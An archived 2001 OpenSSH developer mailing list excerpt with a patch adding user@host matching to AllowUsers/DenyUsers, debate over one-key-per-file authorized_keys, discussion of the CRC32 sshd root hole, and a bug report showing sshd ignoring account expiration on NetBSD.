*ip, + const char *pattern) +{ + int ret; + char *p2; + char *p; + + p = strchr(pattern,'@'); + + if (!p) return match_pattern(user, pattern); + + p2 = xstrdup(pattern); + p = strchr(p2, '@'); + + *p = 0; + + ret = match_pattern(user,p2) && match_host(host, ip, p + 1); + + xfree(p2); + return ret; +} + + +/* * Check if the user is allowed to log in via ssh. If user is listed * in DenyUsers or one of user's groups is listed in DenyGroups, false * will be returned. If AllowUsers isn't empty and user isn't listed @@ -103,14 +153,18 @@ /* Return false if user is listed in DenyUsers */ if (options.num_deny_users > 0) { + const char *hostname = get_canonical_hostname(options.reverse_mapping_check); + const char *ipaddr = get_remote_ipaddr(); for (i = 0; i < options.num_deny_users; i++) - if (match_pattern(pw->pw_name, options.deny_users[i])) + if (match_user(pw->pw_name, hostname, ipaddr, options.deny_users[i])) return 0; } /* Return false if AllowUsers isn't empty and user isn't listed there */ if (options.num_allow_users > 0) { + const char *hostname = get_canonical_hostname(options.reverse_mapping_check); + const char *ipaddr = get_remote_ipaddr(); for (i = 0; i < options.num_allow_users; i++) - if (match_pattern(pw->pw_name, options.allow_users[i])) + if (match_user(pw->pw_name, hostname, ipaddr, options.allow_users[i])) break; /* i < options.num_allow_users iff we break for loop */ if (i >= options.num_allow_users) Index: sshd.8 =================================================================== RCS file: /cvs/openssh_cvs/sshd.8,v retrieving revision 1.78 diff -u -r1.78 sshd.8 --- sshd.8 2001/05/04 22:38:43 1.78 +++ sshd.8 2001/06/04 15:20:54 @@ -330,6 +330,9 @@ wildcards in the patterns. Only user names are valid; a numerical user ID isn't recognized. By default login is allowed regardless of the user name. +If the pattern takes the form USER at HOST then USER and HOST +are separately checked, allowing you to restrict logins to particular +users from particular hosts. .Pp .It Cm Banner In some jurisdictions, sending a warning message before authentication From gert at greenie.muc.de Tue Jun 5 01:50:32 2001 From: gert at greenie.muc.de (Gert Doering) Date: Mon, 4 Jun 2001 17:50:32 +0200 Subject: authorized_keys2 directory idea In-Reply-To: ; from Jason Stone on Mon, Jun 04, 2001 at 01:23:15AM -0700 References: <200106040329.f543T5n24299@cvs.openbsd.org> Message-ID: <20010604175032.A26171@greenie.muc.de> Hi, On Mon, Jun 04, 2001 at 01:23:15AM -0700, Jason Stone wrote: > > OpenSSH is security software. A lot of you keep asking for more and > > more features, and the code keeps growing and growing and growing. > > Assuming that the number of lines per bug is a constant, how long > > before one of these features which noone uses becomes a hole? > > > > I think it is ridiculous how some people keep demanding change. > > > > Sorry, but I firmly believe that change for the sake of "I like it" is > > stupid. > > I agree. However, taking such a stand brings with it a risk of > psuedo-forking. You say you won't take this patch because the feature is > unnecesary bloat. The patch writer says okay, and just rolls it in > himself on all his boxes. He also posts it on his website, and all the > other people who liked the idea download it and roll it into their local > installations. I second this - it's likely to happen sooner than later. There are a number of things floating around that people *do* want to see, and one day, somebody will start "FlexSSH". I don't think this is a good thing. Which doesn't mean every single thinkable feature should go into the OpenSSH code. But I don't think well-localized ones that touch only a very few places are such a bad thing. gert -- USENET is *not* the non-clickable part of WWW! //www.muc.de/~gert/ Gert Doering - Munich, Germany gert at greenie.muc.de fax: +49-89-35655025 gert.doering at physik.tu-muenchen.de From rob at hagopian.net Tue Jun 5 02:27:20 2001 From: rob at hagopian.net (Rob Hagopian) Date: Mon, 4 Jun 2001 12:27:20 -0400 (EDT) Subject: authorized_keys2 directory idea In-Reply-To: Message-ID: On Mon, 4 Jun 2001 mouring at etoh.eviladmin.org wrote: > Lets do a small reality check. OpenSSH has had a complete v2 compatibity > for how long now? 8 months? No.. 6 months? no.. 5 months? no.. Try > about a month. > > Lets do another reality check. How many people are still using v1? > Still over 5x the user base of v2. > > > THIS IS TOTALLY STUPID. v2 is default for all transactions as of > v2.9. Which means OpenSSH will only step down if (a) the users tells the > software to, (b) the v2 keys don't exist, and (c) If the remote side can > not speak v2. IMNSHO this is the correct behavior for at least another > year. Maybe by that time we can look at the v2 and v1 stats and consider > disabling v1. > > Migration paths are required evils. Thus is the reason Markus has taken > painful amount writing all that compatibility code for v1. And thus is > the reason why ssh.com is a pain in the ass. So now security decisions are made via stats user stats and not on the security merits? That's in direct contradiction to your reasoning for excluding this patch. > > I won't claim that that's completely untrue, I notice a lot of emails from > > people who want stuff from the portable code base to migrate back into > > core. But I don't think it's fair, or even wise, to reject what three > > What portable code? OpenSSH portable should implement no 'new' features > outside what is required to get to compile and run. > > We attempt to bring in 'universal' changes back to the OpenBSD tree when > we feel it is right, but I see no reason why (Example) IRIX's overly > complex authetication code needs to be put into the clean OpenBSD tree. True, portable shouldn't add universal features, and that's another good reason not to put it in main portable diffs. I understand Theo's arguments for not putting it in the main code base as well considering the extensive auditing that OpenBSD gets. I don't understand the objections to contrib, unless there's a desire to eventually cause a fork. > I'll step up and state "No I do not feel that it's any easier to > track a single file vs multiple little files. Therefor I do not wish > to see such code added to the core tree." OK, that's 3:2, with the only objections coming from the developers themselves. Way to listen to the users... isn't this exactly what happened with gcc? > > And a number of files in contrib are actually required to build all the > > packages for at least redhat. Since portable openssh distributes binaries > > of these packages aren't those basicly required to work? > > > > You are trying to extend logic that is not correct. All but a few cases > in contrib/, the files are there to support the portable version > directly. You directly need contrib/redhat/ or else you have > authentication issues if you wish to use pam. This is nothing like "I > wan't feature XYZ, but no one wants to commit it therefor I demand it be > in contrib/." So you can't use gnome-ask-pass under openbsd? And my assertion has been all along that there aren't enough patches (chroot.diff) in contrib that this should be a big deal anyways. > > Finally, if you don't want it in the code dists, what about a webpage with > > contrib patches? That would even give you an indication of popularity of > > these patches. Shutting out contributed code like this can only hurt the > > project in the long run... > > -Rob > > Requiring people like myself who help keep the OpenSSH portable tree alive > to maintain all those code snipets will hurt the project even more. > Because in the end it's the OpenBSD and OpenSSH Portable group stuck with > dragging this contrib code forward to each new release. Not the original > author who has long since left the mailinglist and potentially their job > and no longer cares about the patch they submitted. Excuse me? I NEVER said you should maintain the code snippet, only that you should distribute it. Everything in every contrib is almost by definition AYOR... > I look at contrib/ diff files as yet another thing a user will bitch about > if it does not apply cleaningly. A 'feature' they would have never even > dreamed of had the *.diff file not existed. And one more headache to have > to worry about during crunch time in the release process. That certainly doesn't apply to this patch, ssh.com has this feature. In fact, by excluding it you also exclude the possibilty that openssh could be a drop in replacement for ssh.com (keeping existing keys) which would reduce headaches for people rolling the software out. (Note that I don't necessarily support that idea as I suspect the changes would be quite extensive.) > Hell, at time I've almost removed contrib/chroot.diff because it was not > kept up. So why didn't you? If it doesn't have a hope of working in the current version why not remove it until someone fixes it? I never said you should keep known broken code in the tree. > Anyways, I've had enough of this.=) I have real work that needs to be > done. So do it and let users deal with contrib patches... I already described a version system (like apaches) that would make it clear to developers when they are working on/debugging contrib patched versions. There should be zero effort on your part to include this. Certainly less than it's taken to make a stand against extending the software. -Rob From Darren.Moffat at eng.sun.com Tue Jun 5 02:44:30 2001 From: Darren.Moffat at eng.sun.com (Darren Moffat) Date: Mon, 4 Jun 2001 09:44:30 -0700 (PDT) Subject: Handling of password & account expirations Message-ID: <200106041646.f54Gk5Q613647@jurassic.eng.sun.com> >While this no longer applies to OpenBSD now that we have moved to BSD_AUTH I >believe this is still an issue with OpenSSH in the portable release, correct? >We can't expect {Linux,Solaris,} to have BSD_AUTH can we? It shouldn't be an issue on those systems since OpenSSH (unlike the SSH Communications Inc) properly calls pam_acct_mgmt() regardless of which type of authentication was used. On Linux and Solaris the password aging is enforced in a PAM module so the correct thing happens on these systems when the portable release is compiled with PAM support. -- Darren J Moffat From _nuub at yahoo.com Tue Jun 5 03:08:21 2001 From: _nuub at yahoo.com (nuuB) Date: Mon, 4 Jun 2001 10:08:21 -0700 (PDT) Subject: Recent breakins / SSHD root hole? Message-ID: <20010604170821.56346.qmail@web11202.mail.yahoo.com> >> >> Basically what I'd like to know is: What version of the OpenSSH daemon >> would I need to run in order NOT to be vulnerable to this "weakness"? > >Sounds like >ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-00:30.openssh.asc No, I don't think so. AFAIK that bug was fixed in 2.1.1, and apache.org reportedly ran "OpenSSH 2.2". But doing a bit more digging I found http://www.securityfocus.com/templates/advisory.html?id=3087 "Remote vulnerability in SSH daemon crc32 compensation attack detector" This wasn't fixed until 2.3.0. This hole requires quite a lot of constants to be correct, and having local access makes this easier. This could explain why it wasn't exploited remotely on apache.org (though it could have been). obOpenSSH: Anyhow, the fact that I had missed this hole completely has given me a new perspective. Normally I try to keep on top of all security holes in products I use. But for the past 6 months I haven't been reading bugtraq (the main source for such information). I find the SNR way to low these days. Its annoying to see an advisory on product X, then like 10 advisories on the same subject from a bunch of vendors (mostly Linux ones...) that ship product X. So I left bugtraq and instead relied on my vendors (Redhat) ability to issue proper updates (yeah I know, stupid, but I thought it better than doing nothing). It appears they haven't issued a bulletin for this problem (even though they ship OpenSSH 2.1.1 in RH 7.0). They did issue http://www.redhat.com/support/errata/RHSA-2001-041.html which fixes two other (much less serious) problems. It also happens to fix the above CRC attack, but it isn't mentioned in redhats bulletin (and I doubt they knew about it). I don't upgrade things unless there is a problem that affects me (wise from previous updates where new problems of course snuck in with the upgrade). The two minor things mentioned didn't affect me, so I didn't upgrade. So here I am, 2 Jun, with a root hole that was announced on Feb 8. Almost 4 months with an open root hole. Gives me a real warm'n'fuzzy.... NOT. The only thing making me feel better is that the exploitation is quite a far from ./hack with the public exploit. Ah well. I guess it's back to bugtraq, and more time wasted weeding through the junk to find the good bits... Sorry about the rant. nuuB __________________________________________________ Do You Yahoo!? Get personalized email addresses from Yahoo! Mail - only $35 a year! http://personal.mail.yahoo.com/ From markus.friedl at informatik.uni-erlangen.de Tue Jun 5 02:04:18 2001 From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Mon, 4 Jun 2001 18:04:18 +0200 Subject: authorized_keys2 directory idea In-Reply-To: ; from jason@shalott.net on Mon, Jun 04, 2001 at 01:23:15AM -0700 References: <200106040329.f543T5n24299@cvs.openbsd.org> Message-ID: <20010604180418.D22001@folly> On Mon, Jun 04, 2001 at 01:23:15AM -0700, Jason Stone wrote: > I agree. However, taking such a stand brings with it a risk of > psuedo-forking. no, forking is not a reason for accepting every patch. right now openssh is already a little bit too fat, since i did accept to many patches in the past :) so, perhaps, we should only add patches if the remove lines from openssh and make everything _simpler_. remember, this is a security program: "complexity is the enemy" -m From markus.friedl at informatik.uni-erlangen.de Tue Jun 5 02:01:05 2001 From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Mon, 4 Jun 2001 18:01:05 +0200 Subject: authorized_keys2 directory idea In-Reply-To: ; from rob@hagopian.net on Mon, Jun 04, 2001 at 12:12:52AM -0400 References: <200106040329.f543T5n24299@cvs.openbsd.org> Message-ID: <20010604180105.C22001@folly> On Mon, Jun 04, 2001 at 12:12:52AM -0400, Rob Hagopian wrote: > OpenSSH changed from the ssh.com directory method... not that that's > always a bad thing, I prefer not having a separate .ssh2 directory. But a > lot of other unix utils have moved to file based rather than line based > config methods for the simple reason that a lot of people working with > these systems find it easier to manage them this way... Do you object to > /proc, pam, and SysV rc scripts as well? so how do i use sort uniq sed if i use multiple files instead of a single file? in a single file i can put the entries in a certain order. there might be some uses for a-key-per-file, however, they do not justify a change in the way openssh is configured. From markus.friedl at informatik.uni-erlangen.de Tue Jun 5 01:57:50 2001 From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Mon, 4 Jun 2001 17:57:50 +0200 Subject: authorized_keys2 directory idea In-Reply-To: ; from pekkas@netcore.fi on Mon, Jun 04, 2001 at 12:52:50AM +0300 References: <20010603114604.B24416@folly> Message-ID: <20010604175750.B22001@folly> On Mon, Jun 04, 2001 at 12:52:50AM +0300, Pekka Savola wrote: > Yes, keeping a file 100% in sync is way easier. But in real situations, > you're often faced by the fact that e.g. 60-90% of the keys are the same, > and the rest vary. Then syncing is a bit more difficult. Editing is also > a bigger (ie: interactive) process when it has to be done on many hosts. > > A problem is backup files if you edit keys with an editor, ie. ones ending > to e.g. ~ or # (depending on the editor). Then if you just delete the > base key, the results might be unexpected. To counter this, filenames > would be scanned and only those that contain only legal characters would > pass. yes, you name one of problems that appear with one-key-per-file. it's also simpler to monitor a single file for changes. it's easier to introduce races if you use multiple files. but the main reason is: there won't be 2 different ways for doing the same thing and we won't drop the old scheme so we will not use a-key-per-file > > > What do you think -- would this be useful? Bloat? Could it be considered > > > to be merged if it was implemented? > > > > i don't think it's useful. ssh.com switched to a-key-per-file, > > but openssh and the traditional ssh use a-key-per-line > > I wasn't aware ssh.com is doing something like this too. So it might be > something to be done sooner or later, though. no, i don't think that we should try to clone their implementaion. From pekkas at netcore.fi Tue Jun 5 05:37:15 2001 From: pekkas at netcore.fi (Pekka Savola) Date: Mon, 4 Jun 2001 22:37:15 +0300 (EEST) Subject: Recent breakins / SSHD root hole? In-Reply-To: <20010604170821.56346.qmail@web11202.mail.yahoo.com> Message-ID: On Mon, 4 Jun 2001, nuuB wrote: [snip] > which fixes two other (much less serious) problems. It also happens to fix the > above CRC attack, but it isn't mentioned in redhats bulletin (and I doubt they > knew about it). I don't upgrade things unless there is a problem that affects > me (wise from previous updates where new problems of course snuck in with the > upgrade). The two minor things mentioned didn't affect me, so I didn't upgrade. > So here I am, 2 Jun, with a root hole that was announced on Feb 8. Almost 4 > months with an open root hole. Gives me a real warm'n'fuzzy.... NOT. The only > thing making me feel better is that the exploitation is quite a far from ./hack > with the public exploit. AFAIR, exploitation of the bug is in practise only possible with very good knowledge and access to the system etc. -- practically you would have to have an account in the box and still it wouldn't be child's play. Not something you can turn to "script-kiddie" type attack anyhow. -- Pekka Savola "Tell me of difficulties surmounted, Netcore Oy not those you stumble over and fall" Systems. Networks. Security. -- Robert Jordan: A Crown of Swords From wichert at valinux.com Tue Jun 5 05:46:11 2001 From: wichert at valinux.com (Wichert Akkerman) Date: Mon, 4 Jun 2001 21:46:11 +0200 Subject: Recent breakins / SSHD root hole? In-Reply-To: <20010604170821.56346.qmail@web11202.mail.yahoo.com>; from _nuub@yahoo.com on Mon, Jun 04, 2001 at 10:08:21AM -0700 References: <20010604170821.56346.qmail@web11202.mail.yahoo.com> Message-ID: <20010604214610.N1971@cistron.nl> Previously nuuB wrote: > No, I don't think so. AFAIK that bug was fixed in 2.1.1, and apache.org > reportedly ran "OpenSSH 2.2". apache.org never had an insecure ssh, someone knew a password for an account and used that. Wichert. -- _________________________________________________________________ / Nothing is fool-proof to a sufficiently talented fool \ | wichert at cistron.nl http://www.liacs.nl/~wichert/ | | 1024D/2FA3BC2D 576E 100B 518D 2F16 36B0 2805 3CB8 9250 2FA3 BC2D | From markus.friedl at informatik.uni-erlangen.de Tue Jun 5 06:00:43 2001 From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Mon, 4 Jun 2001 22:00:43 +0200 Subject: authorized_keys2 directory idea In-Reply-To: ; from rob@hagopian.net on Mon, Jun 04, 2001 at 10:41:44AM -0400 References: <20010604102059.B29589@folly> Message-ID: <20010604220043.A325@folly> On Mon, Jun 04, 2001 at 10:41:44AM -0400, Rob Hagopian wrote: > Indeed, you never did touch the code base, but you still had to add a > number of features/changes to the code to support v2. the protocol is documented in an ietf draft. > I'd still maintain that the ssh v2 ability to store keys as files > came (long) before openssh v2 support. of course. more software has been written before openssh v2. > Why even cater to those people? Even the FreeBSD security notices > specificly mention that ssh v1 has inherent security problems. you mix talk about protocol and implementation. > I don't > even see why it's turned on by default for a distribution that > superficially appears so security concious. so, what's the problem with protocol v1? even if it had inherent security problems, it's not inherent in the way the public keys are stored. > Finally, if you don't want it in the code dists, what about a webpage with > contrib patches? That would even give you an indication of popularity of > these patches. Shutting out contributed code like this can only hurt the > project in the long run... i'm not shutting out contributed code. From markus.friedl at informatik.uni-erlangen.de Tue Jun 5 06:09:31 2001 From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Mon, 4 Jun 2001 22:09:31 +0200 Subject: authorized_keys2 directory idea In-Reply-To: ; from rob@hagopian.net on Mon, Jun 04, 2001 at 12:27:20PM -0400 References: Message-ID: <20010604220931.B325@folly> On Mon, Jun 04, 2001 at 12:27:20PM -0400, Rob Hagopian wrote: > So now security decisions are made via stats user stats and not on the > security merits? That's in direct contradiction to your reasoning for > excluding this patch. what's wrong with protocol v1? does it matter to you? From pekkas at netcore.fi Tue Jun 5 06:10:01 2001 From: pekkas at netcore.fi (Pekka Savola) Date: Mon, 4 Jun 2001 23:10:01 +0300 (EEST) Subject: authorized_keys2 directory idea In-Reply-To: <20010604180418.D22001@folly> Message-ID: On Mon, 4 Jun 2001, Markus Friedl wrote: > > right now openssh is already a little bit too fat, > since i did accept to many patches in the past :) > > so, perhaps, we should only add patches if the remove lines from > openssh and make everything _simpler_. > > remember, this is a security program: > > "complexity is the enemy" Too much simplicity will also hinder usability, unfortunately. Some like programs simpler than others; many think OpenBSD takes KISS paradigm sometimes too far -- others like it that way. The extent of features optimally included depends on the application. I consider ssh one of those that needs more than the average. Just my humble IMO of course. It would be nice if it was possible to get the main ssh/sshd thinner, and put more functionality in completely non-privileged "modules". That way security-critical code hopefully could be minimized and cleaned, while keeping the usability and most features in. -- Pekka Savola "Tell me of difficulties surmounted, Netcore Oy not those you stumble over and fall" Systems. Networks. Security. -- Robert Jordan: A Crown of Swords From rob at hagopian.net Tue Jun 5 06:11:54 2001 From: rob at hagopian.net (Rob Hagopian) Date: Mon, 4 Jun 2001 16:11:54 -0400 (EDT) Subject: authorized_keys2 directory idea In-Reply-To: <20010604180105.C22001@folly> Message-ID: I'm surprised you're advocating the use of sed on authorized_keys files! It's pretty sick, but: cat keys/* | sort | uniq | sed | split -l 1 But of course you lose filenames... you might be able to pull them out of the comment field... but the point isn't to make it more difficult... How do you see the time a key was added to your single file? Can you track individual key changes through utils like tripwire? How about making some keys immutable but allowing others to be updated? Can I make a symlink to a common public key that root updates? I'm not saying that there aren't advantages to a single file, although I'd be a lot less likely to use sort/uniq/sed than I would be to make a key immutable, but there are some advantages to separate files too. As I think about it, I think that taking both and merging them gives even more flexibility. If you allow multiple files, each with one *or more* keys in it, you don't change the existing key lookup code except to include more files in the searching (authorized_keys2 and authorized_dir2/* or such). A cursory look at the code looks to add about 10 lines of code to add that functionality. -Rob On Mon, 4 Jun 2001, Markus Friedl wrote: > On Mon, Jun 04, 2001 at 12:12:52AM -0400, Rob Hagopian wrote: > > OpenSSH changed from the ssh.com directory method... not that that's > > always a bad thing, I prefer not having a separate .ssh2 directory. But a > > lot of other unix utils have moved to file based rather than line based > > config methods for the simple reason that a lot of people working with > > these systems find it easier to manage them this way... Do you object to > > /proc, pam, and SysV rc scripts as well? > > so how do i use > sort > uniq > sed > if i use multiple files instead of a single file? > > in a single file i can put the entries in a certain order. > > there might be some uses for a-key-per-file, however, > they do not justify a change in the way openssh > is configured. > From markus.friedl at informatik.uni-erlangen.de Tue Jun 5 06:12:52 2001 From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Mon, 4 Jun 2001 22:12:52 +0200 Subject: authorized_keys2 directory idea In-Reply-To: <20010604175032.A26171@greenie.muc.de>; from gert@greenie.muc.de on Mon, Jun 04, 2001 at 05:50:32PM +0200 References: <200106040329.f543T5n24299@cvs.openbsd.org> <20010604175032.A26171@greenie.muc.de> Message-ID: <20010604221252.C325@folly> On Mon, Jun 04, 2001 at 05:50:32PM +0200, Gert Doering wrote: > I second this - it's likely to happen sooner than later. There are a > number of things floating around that people *do* want to see, and one > day, somebody will start "FlexSSH". I don't think this is a good thing. > > Which doesn't mean every single thinkable feature should go into the > OpenSSH code. But I don't think well-localized ones that touch only > a very few places are such a bad thing. openssh is already to big, more than 40K lines, so i see no reason for integrating every possible feature. From markus.friedl at informatik.uni-erlangen.de Tue Jun 5 06:18:55 2001 From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Mon, 4 Jun 2001 22:18:55 +0200 Subject: authorized_keys2 directory idea In-Reply-To: ; from pekkas@netcore.fi on Mon, Jun 04, 2001 at 11:10:01PM +0300 References: <20010604180418.D22001@folly> Message-ID: <20010604221855.A23839@folly> On Mon, Jun 04, 2001 at 11:10:01PM +0300, Pekka Savola wrote: > On Mon, 4 Jun 2001, Markus Friedl wrote: > > > > right now openssh is already a little bit too fat, > > since i did accept to many patches in the past :) > > > > so, perhaps, we should only add patches if the remove lines from > > openssh and make everything _simpler_. > > > > remember, this is a security program: > > > > "complexity is the enemy" > > Too much simplicity will also hinder usability, unfortunately. Some like maybe, but there is no 'simplicity' in OpenSSH, it's fat and keeps getting fatter. > programs simpler than others; many think OpenBSD takes KISS paradigm > sometimes too far -- others like it that way. "OpenBSD takes KISS paradigm sometimes too far"? i really don't think that, OpenBSD is far away from plan9's simplicity. From markus.friedl at informatik.uni-erlangen.de Tue Jun 5 06:21:33 2001 From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Mon, 4 Jun 2001 22:21:33 +0200 Subject: authorized_keys2 directory idea In-Reply-To: ; from rob@hagopian.net on Mon, Jun 04, 2001 at 04:11:54PM -0400 References: <20010604180105.C22001@folly> Message-ID: <20010604222133.B23839@folly> On Mon, Jun 04, 2001 at 04:11:54PM -0400, Rob Hagopian wrote: > How do you see the time a key was added to your single file? rcs > Can you track > individual key changes through utils like tripwire? How about making some > keys immutable but allowing others to be updated? this is not ssh's business. all entries should be immutable to anybody but the user. the user should be able to edit all. From rob at hagopian.net Tue Jun 5 06:25:49 2001 From: rob at hagopian.net (Rob Hagopian) Date: Mon, 4 Jun 2001 16:25:49 -0400 (EDT) Subject: authorized_keys2 directory idea In-Reply-To: <20010604220931.B325@folly> Message-ID: >From FreeBSD-SA-01:24.ssh.asc: "If you are running sshd, disable the use of the SSH1 protocol in OpenSSH. SSH1 contains inherent protocol deficiencies and is not recommended for use in high-security environments. Note that some third-party SSH clients are not capable of using the SSH2 protocol, however the OpenSSH client (version 2.1 and later) included in FreeBSD is SSH2-capable." No, it doesn't matter to me, although all of our higher security boxes have ssh1 turned off. It does worry me that openssh still has a significant amount of ssh.com v1.2.xx code in it. I'm sure it's been audited a number of times, but problems have still cropped up in it recently... -Rob On Mon, 4 Jun 2001, Markus Friedl wrote: > On Mon, Jun 04, 2001 at 12:27:20PM -0400, Rob Hagopian wrote: > > So now security decisions are made via stats user stats and not on the > > security merits? That's in direct contradiction to your reasoning for > > excluding this patch. > > what's wrong with protocol v1? does it matter to you? > From pekkas at netcore.fi Tue Jun 5 06:28:09 2001 From: pekkas at netcore.fi (Pekka Savola) Date: Mon, 4 Jun 2001 23:28:09 +0300 (EEST) Subject: authorized_keys2 directory idea In-Reply-To: <20010604221855.A23839@folly> Message-ID: On Mon, 4 Jun 2001, Markus Friedl wrote: > > programs simpler than others; many think OpenBSD takes KISS paradigm > > sometimes too far -- others like it that way. > > "OpenBSD takes KISS paradigm sometimes too far"? > > i really don't think that, OpenBSD is far away from plan9's simplicity. See what it has amounted to: plan9 is not being used at all (at all so that it counts anyway) and OpenBSD is mainly used by people who want their code clean, or are rather security-conscious (basically). So I don't think striving to make everything much simpler than it currently is, is going to really work in general. -- Pekka Savola "Tell me of difficulties surmounted, Netcore Oy not those you stumble over and fall" Systems. Networks. Security. -- Robert Jordan: A Crown of Swords From raj at cerias.purdue.edu Tue Jun 5 06:37:41 2001 From: raj at cerias.purdue.edu (Brian Poole) Date: Mon, 4 Jun 2001 15:37:41 -0500 Subject: Handling of password & account expirations In-Reply-To: <200106041646.f54Gk5Q613647@jurassic.eng.sun.com>; from Darren.Moffat@eng.sun.com on Mon, Jun 04, 2001 at 09:44:30AM -0700 References: <200106041646.f54Gk5Q613647@jurassic.eng.sun.com> Message-ID: <20010604153741.B4977@basm.cerias.purdue.edu> Quoting Darren Moffat (Darren.Moffat at eng.sun.com) from 4 June 2001: > >While this no longer applies to OpenBSD now that we have moved to BSD_AUTH I > >believe this is still an issue with OpenSSH in the portable release, correct? > >We can't expect {Linux,Solaris,} to have BSD_AUTH can we? > > It shouldn't be an issue on those systems since OpenSSH (unlike the > SSH Communications Inc) properly calls pam_acct_mgmt() regardless of > which type of authentication was used. On Linux and Solaris the > password aging is enforced in a PAM module so the correct thing happens on > these systems when the portable release is compiled with PAM support. Okay, on Linux and Solaris it appears to be fine. FreeBSD looked good from a quick test as well but we can't assume that just because some of the OSes are okay that they all are. For example, on NetBSD this still works (just like it did on OpenBSD until last week). A log snippet is included at the end showing this on a recent snapshot. I assume there are other OSes like this. Just because the OS does not have PAM installed does not mean that we should let this door hang open, does it? -b fubared# ssh -V OpenSSH_2.9 NetBSD_Secure_Shell-20010515, SSH protocols 1.5/2.0, OpenSSL 0x0090601f fubared# userdel -r test fubared# useradd -m test fubared# usermod -f 1 -e"`date +%c`" test fubared# userinfo test login test passwd ************* uid 1000 groups users change Wed Dec 31 19:00:01 1969 class gecos dir /home/test shell /bin/csh expire Mon Jun 4 10:29:53 2001 fubared# passwd test Changing local password for test. New password: Retype new password: fubared# ssh -l test localhost test at localhost's password: Last login: Mon Jun 4 10:24:42 2001 from localhost NetBSD 1.5V (GENERIC) #47: Sat May 26 12:20:02 PDT 2001 Welcome to NetBSD! Spelling is a lossed art. fubared: {1} /* Welp, thats bad.. Respects neither password nor account expiration */ /* Lets verify that they are in fact expired */ fubared# telnet localhost Trying ::1... telnet: connect to address ::1: Connection refused Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. login: test Password: Sorry -- your account has expired. From rob at hagopian.net Tue Jun 5 07:13:44 2001 From: rob at hagopian.net (Rob Hagopian) Date: Mon, 4 Jun 2001 17:13:44 -0400 (EDT) Subject: authorized_keys2 directory idea In-Reply-To: <20010604222133.B23839@folly> Message-ID: On Mon, 4 Jun 2001, Markus Friedl wrote: > On Mon, Jun 04, 2001 at 04:11:54PM -0400, Rob Hagopian wrote: > > How do you see the time a key was added to your single file? > > rcs Fine, but with cvs I could check out individual key files, I can't do that with cvs and a single file. > > Can you track > > individual key changes through utils like tripwire? How about making some > > keys immutable but allowing others to be updated? > > this is not ssh's business. all entries should be immutable > to anybody but the user. the user should be able to edit all. Really... that's awfully heavy handed to lay down security policy like that... In fact, I have a number of keys that I don't want the user to be able to modify at all as we've had problems with that in the past. Not to mention that immutable with a higher security level can not be changed at all without a reboot. And you didn't address sym links... (and if they are set up correctly by the user I don't believe there are security issues) The general point is that every OS I can think of has additional capabilities that can be applied to individual files that can not be applied to multiple lines within a file. Counter, as you noted, is that programs to do bulk modifications (sort and uniq [most of sed's stuff can be done in a loop on all keys]) don't work as well with multiple files. I still don't see why we can't have both, esp in contrib. Life is not simple, there is never one best solution for everyone. Where possible and reasonable I don't see why openssh can't be made more flexible. I strongly feel that this (what I envision as a 20 line patch with low security implications) is one of those times. -Rob From deraadt at cvs.openbsd.org Tue Jun 5 07:40:09 2001 From: deraadt at cvs.openbsd.org (Theo de Raadt) Date: Mon, 04 Jun 2001 15:40:09 -0600 Subject: authorized_keys2 directory idea In-Reply-To: Your message of "Mon, 04 Jun 2001 16:11:54 EDT." Message-ID: <200106042140.f54Le9V30365@cvs.openbsd.org> This is getting very tiring. Can you please start your own ssh derivitive project? > I'm surprised you're advocating the use of sed on authorized_keys files! > > It's pretty sick, but: cat keys/* | sort | uniq | sed | split -l 1 > But of course you lose filenames... you might be able to pull them out of > the comment field... but the point isn't to make it more difficult... > > How do you see the time a key was added to your single file? Can you track > individual key changes through utils like tripwire? How about making some > keys immutable but allowing others to be updated? Can I make a symlink to > a common public key that root updates? > > I'm not saying that there aren't advantages to a single file, although I'd > be a lot less likely to use sort/uniq/sed than I would be to make a key > immutable, but there are some advantages to separate files too. > > As I think about it, I think that taking both and merging them gives even > more flexibility. If you allow multiple files, each with one *or more* > keys in it, you don't change the existing key lookup code except to > include more files in the searching (authorized_keys2 and > authorized_dir2/* or such). > > A cursory look at the code looks to add about 10 lines of code to add that > functionality. > -Rob > > On Mon, 4 Jun 2001, Markus Friedl wrote: > > > On Mon, Jun 04, 2001 at 12:12:52AM -0400, Rob Hagopian wrote: > > > OpenSSH changed from the ssh.com directory method... not that that's > > > always a bad thing, I prefer not having a separate .ssh2 directory. But a > > > lot of other unix utils have moved to file based rather than line based > > > config methods for the simple reason that a lot of people working with > > > these systems find it easier to manage them this way... Do you object to > > > /proc, pam, and SysV rc scripts as well? > > > > so how do i use > > sort > > uniq > > sed > > if i use multiple files instead of a single file? > > > > in a single file i can put the entries in a certain order. > > > > there might be some uses for a-key-per-file, however, > > they do not justify a change in the way openssh > > is configured. > > > From deraadt at cvs.openbsd.org Tue Jun 5 07:40:58 2001 From: deraadt at cvs.openbsd.org (Theo de Raadt) Date: Mon, 04 Jun 2001 15:40:58 -0600 Subject: authorized_keys2 directory idea In-Reply-To: Your message of "Mon, 04 Jun 2001 23:10:01 +0300." Message-ID: <200106042140.f54LewV25801@cvs.openbsd.org> > Too much simplicity will also hinder usability, unfortunately. Some like > programs simpler than others; many think OpenBSD takes KISS paradigm > sometimes too far -- others like it that way. The extent of features > optimally included depends on the application. I consider ssh one of > those that needs more than the average. Just my humble IMO of course. > > It would be nice if it was possible to get the main ssh/sshd thinner, and > put more functionality in completely non-privileged "modules". That way > security-critical code hopefully could be minimized and cleaned, while > keeping the usability and most features in. If any of you put in 1% of the work Markus has put in, we would listen to you. Am I being harsh? Yes. Am I being realistic? Yes. From deraadt at cvs.openbsd.org Tue Jun 5 07:43:14 2001 From: deraadt at cvs.openbsd.org (Theo de Raadt) Date: Mon, 04 Jun 2001 15:43:14 -0600 Subject: authorized_keys2 directory idea In-Reply-To: Your message of "Mon, 04 Jun 2001 16:25:49 EDT." Message-ID: <200106042143.f54LhEV08885@cvs.openbsd.org> > It does worry me that openssh still has a significant amount of ssh.com > v1.2.xx code in it. I'm sure it's been audited a number of times, but > problems have still cropped up 